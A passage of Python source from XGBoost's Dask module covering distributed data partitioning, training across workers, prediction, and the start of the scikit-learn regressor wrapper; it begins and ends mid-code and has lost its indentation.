# [(x0, y0, ..), (x1, y1, ..), ..] in delayed form
parts = client.compute(parts)
await distributed.wait(parts) # async wait for parts to be computed
for part in parts:
assert part.status == 'finished', part.status
# Preserving the partition order for prediction.
self.partition_order = {}
for i, part in enumerate(parts):
self.partition_order[part.key] = i
key_to_partition = {part.key: part for part in parts}
who_has = await client.scheduler.who_has(keys=[part.key for part in parts])
worker_map: Dict[str, "distributed.Future"] = defaultdict(list)
for key, workers in who_has.items():
worker_map[next(iter(workers))].append(key_to_partition[key])
self.worker_map = worker_map
self.meta_names = meta_names
if feature_weights is None:
self.feature_weights = None
else:
self.feature_weights = await client.compute(feature_weights).result()
return self
def _create_fn_args(self, worker_addr: str) -> Dict[str, Any]:
'''Create a dictionary of objects that can be pickled for function
arguments.
'''
return {'feature_names': self.feature_names,
'feature_types': self.feature_types,
'feature_weights': self.feature_weights,
'meta_names': self.meta_names,
'missing': self.missing,
'parts': self.worker_map.get(worker_addr, None),
'is_quantile': self.is_quantile}
def num_col(self) -> int:
return self._n_cols
_DataParts = List[Tuple[Any, Optional[Any], Optional[Any], Optional[Any], Optional[Any],
Optional[Any], Optional[Any]]]
def _get_worker_parts_ordered(
meta_names: List[str], list_of_parts: _DataParts
) -> _DataParts:
# List of partitions like: [(x3, y3, w3, m3, ..), ..], order is not preserved.
assert isinstance(list_of_parts, list)
result = []
for i, _ in enumerate(list_of_parts):
data = list_of_parts[i][0]
labels = None
weights = None
base_margin = None
qid = None
label_lower_bound = None
label_upper_bound = None
# Iterate through all possible meta info, brings small overhead as in xgboost
# there are constant number of meta info available.
for j, blob in enumerate(list_of_parts[i][1:]):
if meta_names[j] == 'labels':
labels = blob
elif meta_names[j] == 'weights':
weights = blob
elif meta_names[j] == 'base_margin':
base_margin = blob
elif meta_names[j] == 'qid':
qid = blob
elif meta_names[j] == 'label_lower_bound':
label_lower_bound = blob
elif meta_names[j] == 'label_upper_bound':
label_upper_bound = blob
else:
raise ValueError('Unknown metainfo:', meta_names[j])
result.append((data, labels, weights, base_margin, qid, label_lower_bound,
label_upper_bound))
return result
def _unzip(list_of_parts: _DataParts) -> List[Tuple[Any, ...]]:
return list(zip(*list_of_parts))
def _get_worker_parts(
list_of_parts: _DataParts, meta_names: List[str]
) -> List[Tuple[Any, ...]]:
partitions = _get_worker_parts_ordered(meta_names, list_of_parts)
partitions_unzipped = _unzip(partitions)
return partitions_unzipped
class DaskPartitionIter(DataIter): # pylint: disable=R0902
"""A data iterator for `DaskDeviceQuantileDMatrix`."""
def __init__(
self,
data: Tuple[Any, ...],
label: Optional[Tuple[Any, ...]] = None,
weight: Optional[Tuple[Any, ...]] = None,
base_margin: Optional[Tuple[Any, ...]] = None,
qid: Optional[Tuple[Any, ...]] = None,
label_lower_bound: Optional[Tuple[Any, ...]] = None,
label_upper_bound: Optional[Tuple[Any, ...]] = None,
feature_names: Optional[Union[str, List[str]]] = None,
feature_types: Optional[Union[Any, List[Any]]] = None
) -> None:
self._data = data
self._labels = label
self._weights = weight
self._base_margin = base_margin
self._qid = qid
self._label_lower_bound = label_lower_bound
self._label_upper_bound = label_upper_bound
self._feature_names = feature_names
self._feature_types = feature_types
assert isinstance(self._data, Sequence)
types = (Sequence, type(None))
assert isinstance(self._labels, types)
assert isinstance(self._weights, types)
assert isinstance(self._base_margin, types)
assert isinstance(self._label_lower_bound, types)
assert isinstance(self._label_upper_bound, types)
self._iter = 0 # set iterator to 0
super().__init__()
def data(self) -> Any:
'''Utility function for obtaining current batch of data.'''
return self._data[self._iter]
def labels(self) -> Any:
'''Utility function for obtaining current batch of label.'''
if self._labels is not None:
return self._labels[self._iter]
return None
def weights(self) -> Any:
'''Utility function for obtaining current batch of label.'''
if self._weights is not None:
return self._weights[self._iter]
return None
def qids(self) -> Any:
'''Utility function for obtaining current batch of query id.'''
if self._qid is not None:
return self._qid[self._iter]
return None
def base_margins(self) -> Any:
'''Utility function for obtaining current batch of base_margin.'''
if self._base_margin is not None:
return self._base_margin[self._iter]
return None
def label_lower_bounds(self) -> Any:
'''Utility function for obtaining current batch of label_lower_bound.
'''
if self._label_lower_bound is not None:
return self._label_lower_bound[self._iter]
return None
def label_upper_bounds(self) -> Any:
'''Utility function for obtaining current batch of label_upper_bound.
'''
if self._label_upper_bound is not None:
return self._label_upper_bound[self._iter]
return None
def reset(self) -> None:
'''Reset the iterator'''
self._iter = 0
def next(self, input_data: Callable) -> int:
'''Yield next batch of data'''
if self._iter == len(self._data):
# Return 0 when there's no more batch.
return 0
feature_names: Optional[Union[List[str], str]] = None
if self._feature_names:
feature_names = self._feature_names
else:
if hasattr(self.data(), 'columns'):
feature_names = self.data().columns.format()
else:
feature_names = None
input_data(data=self.data(), label=self.labels(),
weight=self.weights(), group=None,
qid=self.qids(),
label_lower_bound=self.label_lower_bounds(),
label_upper_bound=self.label_upper_bounds(),
feature_names=feature_names,
feature_types=self._feature_types)
self._iter += 1
return 1
class DaskDeviceQuantileDMatrix(DaskDMatrix):
'''Specialized data type for `gpu_hist` tree method. This class is used to reduce the
memory usage by eliminating data copies. Internally the all partitions/chunks of data
are merged by weighted GK sketching. So the number of partitions from dask may affect
training accuracy as GK generates bounded error for each merge. See doc string for
:py:obj:`xgboost.DeviceQuantileDMatrix` and :py:obj:`xgboost.DMatrix` for other
parameters.
.. versionadded:: 1.2.0
Parameters
----------
max_bin : Number of bins for histogram construction.
'''
@_deprecate_positional_args
def __init__(
self,
client: "distributed.Client",
data: _DaskCollection,
label: Optional[_DaskCollection] = None,
*,
weight: Optional[_DaskCollection] = None,
base_margin: Optional[_DaskCollection] = None,
missing: float = None,
silent: bool = False, # disable=unused-argument
feature_names: Optional[Union[str, List[str]]] = None,
feature_types: Optional[Union[Any, List[Any]]] = None,
max_bin: int = 256,
group: Optional[_DaskCollection] = None,
qid: Optional[_DaskCollection] = None,
label_lower_bound: Optional[_DaskCollection] = None,
label_upper_bound: Optional[_DaskCollection] = None,
feature_weights: Optional[_DaskCollection] = None,
enable_categorical: bool = False,
) -> None:
super().__init__(
client=client,
data=data,
label=label,
weight=weight,
base_margin=base_margin,
group=group,
qid=qid,
label_lower_bound=label_lower_bound,
label_upper_bound=label_upper_bound,
missing=missing,
silent=silent,
feature_weights=feature_weights,
feature_names=feature_names,
feature_types=feature_types,
enable_categorical=enable_categorical,
)
self.max_bin = max_bin
self.is_quantile = True
def _create_fn_args(self, worker_addr: str) -> Dict[str, Any]:
args = super()._create_fn_args(worker_addr)
args["max_bin"] = self.max_bin
return args
def _create_device_quantile_dmatrix(
feature_names: Optional[Union[str, List[str]]],
feature_types: Optional[Union[Any, List[Any]]],
feature_weights: Optional[Any],
meta_names: List[str],
missing: float,
parts: Optional[_DataParts],
max_bin: int,
) -> DeviceQuantileDMatrix:
worker = distributed.get_worker()
if parts is None:
msg = "worker {address} has an empty DMatrix.".format(address=worker.address)
LOGGER.warning(msg)
import cupy
d = DeviceQuantileDMatrix(
cupy.zeros((0, 0)),
feature_names=feature_names,
feature_types=feature_types,
max_bin=max_bin,
)
return d
(
data,
labels,
weights,
base_margin,
qid,
label_lower_bound,
label_upper_bound,
) = _get_worker_parts(parts, meta_names)
it = DaskPartitionIter(
data=data,
label=labels,
weight=weights,
base_margin=base_margin,
qid=qid,
label_lower_bound=label_lower_bound,
label_upper_bound=label_upper_bound,
)
dmatrix = DeviceQuantileDMatrix(
it,
missing=missing,
feature_names=feature_names,
feature_types=feature_types,
nthread=worker.nthreads,
max_bin=max_bin,
)
dmatrix.set_info(feature_weights=feature_weights)
return dmatrix
def _create_dmatrix(
feature_names: Optional[Union[str, List[str]]],
feature_types: Optional[Union[Any, List[Any]]],
feature_weights: Optional[Any],
meta_names: List[str],
missing: float,
parts: Optional[_DataParts]
) -> DMatrix:
'''Get data that local to worker from DaskDMatrix.
Returns
-------
A DMatrix object.
'''
worker = distributed.get_worker()
list_of_parts = parts
if list_of_parts is None:
msg = 'worker {address} has an empty DMatrix. '.format(address=worker.address)
LOGGER.warning(msg)
d = DMatrix(numpy.empty((0, 0)),
feature_names=feature_names,
feature_types=feature_types)
return d
T = TypeVar('T')
def concat_or_none(data: Tuple[Optional[T], ...]) -> Optional[T]:
if any(part is None for part in data):
return None
return concat(data)
(data, labels, weights, base_margin, qid,
label_lower_bound, label_upper_bound) = _get_worker_parts(list_of_parts, meta_names)
_labels = concat_or_none(labels)
_weights = concat_or_none(weights)
_base_margin = concat_or_none(base_margin)
_qid = concat_or_none(qid)
_label_lower_bound = concat_or_none(label_lower_bound)
_label_upper_bound = concat_or_none(label_upper_bound)
_data = concat(data)
dmatrix = DMatrix(
_data,
_labels,
missing=missing,
feature_names=feature_names,
feature_types=feature_types,
nthread=worker.nthreads,
)
dmatrix.set_info(
base_margin=_base_margin,
qid=_qid,
weight=_weights,
label_lower_bound=_label_lower_bound,
label_upper_bound=_label_upper_bound,
feature_weights=feature_weights,
)
return dmatrix
def _dmatrix_from_list_of_parts(
is_quantile: bool, **kwargs: Any
) -> Union[DMatrix, DeviceQuantileDMatrix]:
if is_quantile:
return _create_device_quantile_dmatrix(**kwargs)
return _create_dmatrix(**kwargs)
async def _get_rabit_args(n_workers: int, client: "distributed.Client") -> List[bytes]:
'''Get rabit context arguments from data distribution in DaskDMatrix.'''
env = await client.run_on_scheduler(_start_tracker, n_workers)
rabit_args = [('%s=%s' % item).encode() for item in env.items()]
return rabit_args
# train and predict methods are supposed to be "functional", which meets the
# dask paradigm. But as a side effect, the `evals_result` in single-node API
# is no longer supported since it mutates the input parameter, and it's not
# intuitive to sync the mutation result. Therefore, a dictionary containing
# evaluation history is instead returned.
def _get_workers_from_data(
dtrain: DaskDMatrix,
evals: Optional[List[Tuple[DaskDMatrix, str]]]
) -> Set[str]:
X_worker_map: Set[str] = set(dtrain.worker_map.keys())
if evals:
for e in evals:
assert len(e) == 2
assert isinstance(e[0], DaskDMatrix) and isinstance(e[1], str)
if e[0] is dtrain:
continue
worker_map = set(e[0].worker_map.keys())
X_worker_map = X_worker_map.union(worker_map)
return X_worker_map
async def _train_async(
client: "distributed.Client",
global_config: Dict[str, Any],
params: Dict[str, Any],
dtrain: DaskDMatrix,
num_boost_round: int,
evals: Optional[List[Tuple[DaskDMatrix, str]]],
obj: Optional[Objective],
feval: Optional[Metric],
early_stopping_rounds: Optional[int],
verbose_eval: Union[int, bool],
xgb_model: Optional[Booster],
callbacks: Optional[List[TrainingCallback]]
) -> Optional[TrainReturnT]:
workers = list(_get_workers_from_data(dtrain, evals))
_rabit_args = await _get_rabit_args(len(workers), client)
if params.get("booster", None) == "gblinear":
raise NotImplementedError(
f"booster `{params['booster']}` is not yet supported for dask."
)
def dispatched_train(
worker_addr: str,
rabit_args: List[bytes],
dtrain_ref: Dict,
dtrain_idt: int,
evals_ref: Dict
) -> Optional[Dict[str, Union[Booster, Dict]]]:
'''Perform training on a single worker. A local function prevents pickling.
'''
LOGGER.debug('Training on %s', str(worker_addr))
worker = distributed.get_worker()
with RabitContext(rabit_args), config.config_context(**global_config):
local_dtrain = _dmatrix_from_list_of_parts(**dtrain_ref)
local_evals = []
if evals_ref:
for ref, name, idt in evals_ref:
if idt == dtrain_idt:
local_evals.append((local_dtrain, name))
continue
local_evals.append((_dmatrix_from_list_of_parts(**ref), name))
local_history: Dict = {}
local_param = params.copy() # just to be consistent
msg = 'Overriding `nthreads` defined in dask worker.'
override = ['nthread', 'n_jobs']
for p in override:
val = local_param.get(p, None)
if val is not None and val != worker.nthreads:
LOGGER.info(msg)
else:
local_param[p] = worker.nthreads
bst = worker_train(params=local_param,
dtrain=local_dtrain,
num_boost_round=num_boost_round,
evals_result=local_history,
evals=local_evals,
obj=obj,
feval=feval,
early_stopping_rounds=early_stopping_rounds,
verbose_eval=verbose_eval,
xgb_model=xgb_model,
callbacks=callbacks)
ret: Optional[Dict[str, Union[Booster, Dict]]] = {
'booster': bst, 'history': local_history}
if local_dtrain.num_row() == 0:
ret = None
return ret
# Note for function purity:
# XGBoost is deterministic in most of the cases, which means train function is
# supposed to be idempotent. One known exception is gblinear with shotgun updater.
# We haven't been able to do a full verification so here we keep pure to be False.
futures = []
for i, worker_addr in enumerate(workers):
if evals:
# pylint: disable=protected-access
evals_per_worker = [(e._create_fn_args(worker_addr), name, id(e))
for e, name in evals]
else:
evals_per_worker = []
f = client.submit(
dispatched_train,
worker_addr,
_rabit_args,
# pylint: disable=protected-access
dtrain._create_fn_args(workers[i]),
id(dtrain),
evals_per_worker,
pure=False,
workers=[worker_addr]
)
futures.append(f)
results = await client.gather(futures)
return list(filter(lambda ret: ret is not None, results))[0]
def train( # pylint: disable=unused-argument
client: "distributed.Client",
params: Dict[str, Any],
dtrain: DaskDMatrix,
num_boost_round: int = 10,
evals: Optional[List[Tuple[DaskDMatrix, str]]] = None,
obj: Optional[Objective] = None,
feval: Optional[Metric] = None,
early_stopping_rounds: Optional[int] = None,
xgb_model: Optional[Booster] = None,
verbose_eval: Union[int, bool] = True,
callbacks: Optional[List[TrainingCallback]] = None,
) -> Any:
"""Train XGBoost model.
.. versionadded:: 1.0.0
.. note::
Other parameters are the same as :py:func:`xgboost.train` except for
`evals_result`, which is returned as part of function return value instead of
argument.
Parameters
----------
client :
Specify the dask client used for training. Use default client returned from dask
if it's set to None.
Returns
-------
results: dict
A dictionary containing trained booster and evaluation history. `history` field
is the same as `eval_result` from `xgboost.train`.
.. code-block:: python
{'booster': xgboost.Booster,
'history': {'train': {'logloss': ['0.48253', '0.35953']},
'eval': {'logloss': ['0.480385', '0.357756']}}}
"""
_assert_dask_support()
client = _xgb_get_client(client)
# Get global configuration before transferring computation to another thread or
# process.
return client.sync(_train_async, global_config=config.get_config(), **locals())
def _can_output_df(is_df: bool, output_shape: Tuple) -> bool:
return is_df and len(output_shape) <= 2
async def _direct_predict_impl(
mapped_predict: Callable,
booster: "distributed.Future",
data: _DaskCollection,
base_margin: Optional[_DaskCollection],
output_shape: Tuple[int, ...],
meta: Dict[int, str],
) -> _DaskCollection:
columns = list(meta.keys())
if len(output_shape) >= 3 and isinstance(data, dd.DataFrame):
# Without this check, dask will finish the prediction silently even if output
# dimension is greater than 3. But during map_partitions, dask passes a
# `dd.DataFrame` as local input to xgboost, which is converted to csr_matrix by
# `_convert_unknown_data` since dd.DataFrame is not known to xgboost native
# binding.
raise ValueError(
"Use `da.Array` or `DaskDMatrix` when output has more than 2 dimensions."
)
if _can_output_df(isinstance(data, dd.DataFrame), output_shape):
if base_margin is not None and isinstance(base_margin, da.Array):
# Easier for map_partitions
base_margin_df: Optional[dd.DataFrame] = base_margin.to_dask_dataframe()
else:
base_margin_df = base_margin
predictions = dd.map_partitions(
mapped_predict,
booster,
data,
True,
columns,
base_margin_df,
meta=dd.utils.make_meta(meta),
)
# classification can return a dataframe, drop 1 dim when it's reg/binary
if len(output_shape) == 1:
predictions = predictions.iloc[:, 0]
else:
if base_margin is not None and isinstance(
base_margin, (dd.Series, dd.DataFrame)
):
# Easier for map_blocks
base_margin_array: Optional[da.Array] = base_margin.to_dask_array()
else:
base_margin_array = base_margin
# Input data is 2-dim array, output can be 1(reg, binary)/2(multi-class,
# contrib)/3(contrib, interaction)/4(interaction) dims.
if len(output_shape) == 1:
drop_axis: Union[int, List[int]] = [1] # drop from 2 to 1 dim.
new_axis: Union[int, List[int]] = []
else:
drop_axis = []
if isinstance(data, dd.DataFrame):
new_axis = list(range(len(output_shape) - 2))
else:
new_axis = [i + 2 for i in range(len(output_shape) - 2)]
predictions = da.map_blocks(
mapped_predict,
booster,
data,
False,
columns,
base_margin_array,
drop_axis=drop_axis,
new_axis=new_axis,
dtype=numpy.float32,
)
return predictions
def _infer_predict_output(
booster: Booster, features: int, is_df: bool, inplace: bool, **kwargs: Any
) -> Tuple[Tuple[int, ...], Dict[int, str]]:
"""Create a dummy test sample to infer output shape for prediction."""
assert isinstance(features, int)
rng = numpy.random.RandomState(1994)
test_sample = rng.randn(1, features)
if inplace:
kwargs = kwargs.copy()
if kwargs.pop("predict_type") == "margin":
kwargs["output_margin"] = True
m = DMatrix(test_sample)
# generated DMatrix doesn't have feature name, so no validation.
test_predt = booster.predict(m, validate_features=False, **kwargs)
n_columns = test_predt.shape[1] if len(test_predt.shape) > 1 else 1
meta: Dict[int, str] = {}
if _can_output_df(is_df, test_predt.shape):
for i in range(n_columns):
meta[i] = "f4"
return test_predt.shape, meta
async def _get_model_future(
client: "distributed.Client", model: Union[Booster, Dict, "distributed.Future"]
) -> "distributed.Future":
if isinstance(model, Booster):
booster = await client.scatter(model, broadcast=True)
elif isinstance(model, dict):
booster = await client.scatter(model["booster"], broadcast=True)
elif isinstance(model, distributed.Future):
booster = model
if booster.type is not Booster:
raise TypeError(
f"Underlying type of model future should be `Booster`, got {booster.type}"
)
else:
raise TypeError(_expect([Booster, dict, distributed.Future], type(model)))
return booster
# pylint: disable=too-many-statements
async def _predict_async(
client: "distributed.Client",
global_config: Dict[str, Any],
model: Union[Booster, Dict, "distributed.Future"],
data: _DaskCollection,
output_margin: bool,
missing: float,
pred_leaf: bool,
pred_contribs: bool,
approx_contribs: bool,
pred_interactions: bool,
validate_features: bool,
iteration_range: Tuple[int, int],
strict_shape: bool,
) -> _DaskCollection:
_booster = await _get_model_future(client, model)
if not isinstance(data, (DaskDMatrix, da.Array, dd.DataFrame)):
raise TypeError(_expect([DaskDMatrix, da.Array, dd.DataFrame], type(data)))
def mapped_predict(
booster: Booster, partition: Any, is_df: bool, columns: List[int], _: Any
) -> Any:
with config.config_context(**global_config):
m = DMatrix(data=partition, missing=missing)
predt = booster.predict(
data=m,
output_margin=output_margin,
pred_leaf=pred_leaf,
pred_contribs=pred_contribs,
approx_contribs=approx_contribs,
pred_interactions=pred_interactions,
validate_features=validate_features,
iteration_range=iteration_range,
strict_shape=strict_shape,
)
if _can_output_df(is_df, predt.shape):
if lazy_isinstance(partition, "cudf", "core.dataframe.DataFrame"):
import cudf
predt = cudf.DataFrame(predt, columns=columns, dtype=numpy.float32)
else:
predt = DataFrame(predt, columns=columns, dtype=numpy.float32)
return predt
# Predict on dask collection directly.
if isinstance(data, (da.Array, dd.DataFrame)):
_output_shape, meta = await client.compute(
client.submit(
_infer_predict_output,
_booster,
features=data.shape[1],
is_df=isinstance(data, dd.DataFrame),
inplace=False,
output_margin=output_margin,
pred_leaf=pred_leaf,
pred_contribs=pred_contribs,
approx_contribs=approx_contribs,
pred_interactions=pred_interactions,
strict_shape=strict_shape,
)
)
return await _direct_predict_impl(
mapped_predict, _booster, data, None, _output_shape, meta
)
output_shape, _ = await client.compute(
client.submit(
_infer_predict_output,
booster=_booster,
features=data.num_col(),
is_df=False,
inplace=False,
output_margin=output_margin,
pred_leaf=pred_leaf,
pred_contribs=pred_contribs,
approx_contribs=approx_contribs,
pred_interactions=pred_interactions,
strict_shape=strict_shape,
)
)
# Prediction on dask DMatrix.
partition_order = data.partition_order
feature_names = data.feature_names
feature_types = data.feature_types
missing = data.missing
meta_names = data.meta_names
def dispatched_predict(booster: Booster, part: Any) -> numpy.ndarray:
data = part[0]
assert isinstance(part, tuple), type(part)
base_margin = None
for i, blob in enumerate(part[1:]):
if meta_names[i] == "base_margin":
base_margin = blob
with config.config_context(**global_config):
m = DMatrix(
data,
missing=missing,
base_margin=base_margin,
feature_names=feature_names,
feature_types=feature_types,
)
predt = booster.predict(
m,
output_margin=output_margin,
pred_leaf=pred_leaf,
pred_contribs=pred_contribs,
approx_contribs=approx_contribs,
pred_interactions=pred_interactions,
validate_features=validate_features,
)
return predt
all_parts = []
all_orders = []
all_shapes = []
workers_address = list(data.worker_map.keys())
for worker_addr in workers_address:
list_of_parts = data.worker_map[worker_addr]
all_parts.extend(list_of_parts)
all_orders.extend([partition_order[part.key] for part in list_of_parts])
for part in all_parts:
s = client.submit(lambda part: part[0].shape[0], part)
all_shapes.append(s)
all_shapes = await client.gather(all_shapes)
parts_with_order = list(zip(all_parts, all_shapes, all_orders))
parts_with_order = sorted(parts_with_order, key=lambda p: p[2])
all_parts = [part for part, shape, order in parts_with_order]
all_shapes = [shape for part, shape, order in parts_with_order]
futures = []
for part in all_parts:
f = client.submit(dispatched_predict, _booster, part)
futures.append(f)
# Constructing a dask array from list of numpy arrays
# See https://docs.dask.org/en/latest/array-creation.html
arrays = []
for i, rows in enumerate(all_shapes):
arrays.append(
da.from_delayed(
futures[i], shape=(rows,) + output_shape[1:], dtype=numpy.float32
)
)
predictions = da.concatenate(arrays, axis=0)
return predictions
def predict( # pylint: disable=unused-argument
client: "distributed.Client",
model: Union[TrainReturnT, Booster, "distributed.Future"],
data: Union[DaskDMatrix, _DaskCollection],
output_margin: bool = False,
missing: float = numpy.nan,
pred_leaf: bool = False,
pred_contribs: bool = False,
approx_contribs: bool = False,
pred_interactions: bool = False,
validate_features: bool = True,
iteration_range: Tuple[int, int] = (0, 0),
strict_shape: bool = False,
) -> Any:
'''Run prediction with a trained booster.
.. note::
Using ``inplace_predict`` might be faster when some features are not needed. See
:py:meth:`xgboost.Booster.predict` for details on various parameters. When output
has more than 2 dimensions (shap value, leaf with strict_shape), input should be
``da.Array`` or ``DaskDMatrix``.
.. versionadded:: 1.0.0
Parameters
----------
client:
Specify the dask client used for training. Use default client
returned from dask if it's set to None.
model:
The trained model. It can be a distributed.Future so user can
pre-scatter it onto all workers.
data:
Input data used for prediction. When input is a dataframe object,
prediction output is a series.
missing:
Used when input data is not DaskDMatrix. Specify the value
considered as missing.
Returns
-------
prediction: dask.array.Array/dask.dataframe.Series
When input data is ``dask.array.Array`` or ``DaskDMatrix``, the return value is an
array, when input data is ``dask.dataframe.DataFrame``, return value can be
``dask.dataframe.Series``, ``dask.dataframe.DataFrame``, depending on the output
shape.
'''
_assert_dask_support()
client = _xgb_get_client(client)
return client.sync(_predict_async, global_config=config.get_config(), **locals())
async def _inplace_predict_async( # pylint: disable=too-many-branches
client: "distributed.Client",
global_config: Dict[str, Any],
model: Union[Booster, Dict, "distributed.Future"],
data: _DaskCollection,
iteration_range: Tuple[int, int],
predict_type: str,
missing: float,
validate_features: bool,
base_margin: Optional[_DaskCollection],
strict_shape: bool,
) -> _DaskCollection:
client = _xgb_get_client(client)
booster = await _get_model_future(client, model)
if not isinstance(data, (da.Array, dd.DataFrame)):
raise TypeError(_expect([da.Array, dd.DataFrame], type(data)))
if base_margin is not None and not isinstance(
data, (da.Array, dd.DataFrame, dd.Series)
):
raise TypeError(_expect([da.Array, dd.DataFrame, dd.Series], type(base_margin)))
def mapped_predict(
booster: Booster, data: Any, is_df: bool, columns: List[int], base_margin: Any
) -> Any:
with config.config_context(**global_config):
prediction = booster.inplace_predict(
data,
iteration_range=iteration_range,
predict_type=predict_type,
missing=missing,
base_margin=base_margin,
validate_features=validate_features,
strict_shape=strict_shape,
)
if _can_output_df(is_df, prediction.shape):
if lazy_isinstance(data, "cudf.core.dataframe", "DataFrame"):
import cudf
prediction = cudf.DataFrame(
prediction, columns=columns, dtype=numpy.float32
)
else:
# If it's from pandas, the partition is a numpy array
prediction = DataFrame(prediction, columns=columns, dtype=numpy.float32)
return prediction
# await turns future into value.
shape, meta = await client.compute(
client.submit(
_infer_predict_output,
booster,
features=data.shape[1],
is_df=isinstance(data, dd.DataFrame),
inplace=True,
predict_type=predict_type,
iteration_range=iteration_range,
strict_shape=strict_shape,
)
)
return await _direct_predict_impl(
mapped_predict, booster, data, base_margin, shape, meta
)
def inplace_predict( # pylint: disable=unused-argument
client: "distributed.Client",
model: Union[TrainReturnT, Booster, "distributed.Future"],
data: _DaskCollection,
iteration_range: Tuple[int, int] = (0, 0),
predict_type: str = "value",
missing: float = numpy.nan,
validate_features: bool = True,
base_margin: Optional[_DaskCollection] = None,
strict_shape: bool = False,
) -> Any:
"""Inplace prediction. See doc in :py:meth:`xgboost.Booster.inplace_predict` for details.
.. versionadded:: 1.1.0
Parameters
----------
client:
Specify the dask client used for training. Use default client
returned from dask if it's set to None.
model:
See :py:func:`xgboost.dask.predict` for details.
data :
dask collection.
iteration_range:
See :py:meth:`xgboost.Booster.predict` for details.
predict_type:
See :py:meth:`xgboost.Booster.inplace_predict` for details.
missing:
Value in the input data which needs to be present as a missing
value. If None, defaults to np.nan.
base_margin:
See :py:obj:`xgboost.DMatrix` for details. Right now classifier is not well
supported with base_margin as it requires the size of base margin to be `n_classes
* n_samples`.
.. versionadded:: 1.4.0
strict_shape:
See :py:meth:`xgboost.Booster.predict` for details.
.. versionadded:: 1.4.0
Returns
-------
prediction :
When input data is ``dask.array.Array``, the return value is an array, when input
data is ``dask.dataframe.DataFrame``, return value can be
``dask.dataframe.Series``, ``dask.dataframe.DataFrame``, depending on the output
shape.
"""
_assert_dask_support()
client = _xgb_get_client(client)
return client.sync(
_inplace_predict_async, global_config=config.get_config(), **locals()
)
async def _async_wrap_evaluation_matrices(
client: "distributed.Client", **kwargs: Any
) -> Tuple[DaskDMatrix, Optional[List[Tuple[DaskDMatrix, str]]]]:
"""A switch function for async environment."""
def _inner(**kwargs: Any) -> DaskDMatrix:
m = DaskDMatrix(client=client, **kwargs)
return m
train_dmatrix, evals = _wrap_evaluation_matrices(create_dmatrix=_inner, **kwargs)
train_dmatrix = await train_dmatrix
if evals is None:
return train_dmatrix, evals
awaited = []
for e in evals:
if e[0] is train_dmatrix: # already awaited
awaited.append(e)
continue
awaited.append((await e[0], e[1]))
return train_dmatrix, awaited
class DaskScikitLearnBase(XGBModel):
"""Base class for implementing scikit-learn interface with Dask"""
_client = None
async def _predict_async(
self,
data: _DaskCollection,
output_margin: bool,
validate_features: bool,
base_margin: Optional[_DaskCollection],
iteration_range: Optional[Tuple[int, int]],
) -> Any:
iteration_range = self._get_iteration_range(iteration_range)
if self._can_use_inplace_predict():
predts = await inplace_predict(
client=self.client,
model=self.get_booster(),
data=data,
iteration_range=iteration_range,
predict_type="margin" if output_margin else "value",
missing=self.missing,
base_margin=base_margin,
validate_features=validate_features,
)
if isinstance(predts, dd.DataFrame):
predts = predts.to_dask_array()
else:
test_dmatrix = await DaskDMatrix(
self.client, data=data, base_margin=base_margin, missing=self.missing
)
predts = await predict(
self.client,
model=self.get_booster(),
data=test_dmatrix,
output_margin=output_margin,
validate_features=validate_features,
iteration_range=iteration_range,
)
return predts
def predict(
self,
X: _DaskCollection,
output_margin: bool = False,
ntree_limit: Optional[int] = None,
validate_features: bool = True,
base_margin: Optional[_DaskCollection] = None,
iteration_range: Optional[Tuple[int, int]] = None,
) -> Any:
_assert_dask_support()
msg = "`ntree_limit` is not supported on dask, use `iteration_range` instead."
assert ntree_limit is None, msg
return self.client.sync(
self._predict_async,
X,
output_margin=output_margin,
validate_features=validate_features,
base_margin=base_margin,
iteration_range=iteration_range,
)
async def _apply_async(
self,
X: _DaskCollection,
iteration_range: Optional[Tuple[int, int]] = None,
) -> Any:
iteration_range = self._get_iteration_range(iteration_range)
test_dmatrix = await DaskDMatrix(self.client, data=X, missing=self.missing)
predts = await predict(
self.client,
model=self.get_booster(),
data=test_dmatrix,
pred_leaf=True,
iteration_range=iteration_range,
)
return predts
def apply(
self,
X: _DaskCollection,
ntree_limit: Optional[int] = None,
iteration_range: Optional[Tuple[int, int]] = None,
) -> Any:
_assert_dask_support()
msg = "`ntree_limit` is not supported on dask, use `iteration_range` instead."
assert ntree_limit is None, msg
return self.client.sync(self._apply_async, X, iteration_range=iteration_range)
def __await__(self) -> Awaitable[Any]:
# Generate a coroutine wrapper to make this class awaitable.
async def _() -> Awaitable[Any]:
return self
return self.client.sync(_).__await__()
def __getstate__(self) -> Dict:
this = self.__dict__.copy()
if "_client" in this.keys():
del this["_client"]
return this
@property
def client(self) -> "distributed.Client":
"""The dask client used in this model."""
client = _xgb_get_client(self._client)
return client
@client.setter
def client(self, clt: "distributed.Client") -> None:
self._client = clt
@xgboost_model_doc(
"""Implementation of the Scikit-Learn API for XGBoost.""", ["estimators", "model"]
)
class DaskXGBRegressor(DaskScikitLearnBase, XGBRegressorBase):
# pylint: disable=missing-class-docstring
async def _fit_async(
self,
X: _DaskCollection,
y: _DaskCollection,
sample_weight: Optional[_DaskCollection],
base_margin: Optional[_DaskCollection],
eval_set: Optional[List[Tuple[_DaskCollection, _DaskCollection]]],
eval_metric: Optional[Union[str, List[str], Metric]],
sample_weight_eval_set: Optional[List[_DaskCollection]],
base_margin_eval_set: Optional[List[_DaskCollection]],
early_stopping_rounds: int,
verbose: bool,
xgb_model: Optional[Union[Booster, XGBModel]],
feature_weights: Optional[_DaskCollection],
callbacks: Optional[List[TrainingCallback]],
) -> _DaskCollection:
params = self.get_xgb_params()
dtrain, evals = await _async_wrap_evaluation_matrices(
client=self.client,
X=X,
y=y,
group=None,
qid=None,
sample_weight=sample_weight,
base_margin=base_margin,
feature_weights=feature_weights,
eval_set=eval_set,
sample_weight_eval_set=sample_weight_eval_set,
base_margin_eval_set=base_margin_eval_set,
eval_group=None,
eval_qid=None,
missing=self.missing,
)
if callable(self.objective):
obj = _objective_decorator(self.objective)
else:
obj = None
model, metric, params = self._configure_fit(
booster=xgb_model, eval_metric=eval_metric, params=params
)
results = await train(
client=self.client,
params=params,
dtrain=dtrain,
num_boost_round=self.get_num_boosting_rounds(),
evals=evals,
feval=metric,
obj=obj,
verbose_eval=verbose,
early_stopping_rounds=early_stopping_rounds,
callbacks=callbacks,
xgb_model=model,
)
self._Booster = results["booster"]
# pylint: disable=attribute-defined-outside-init
self.evals_result_ = results["history"]
return self
# pylint: disable=missing-docstring, disable=unused-argument
@_deprecate_positional_args
def fit(
self,
X: _DaskCollection,
y: _DaskCollection,
*,
sample_weight: Optional[_DaskCollection] = None,
base_margin: Optional[_DaskCollection] = None,
eval_set: Optional[List[Tuple[_DaskCollection, _DaskCollection]]] = None,
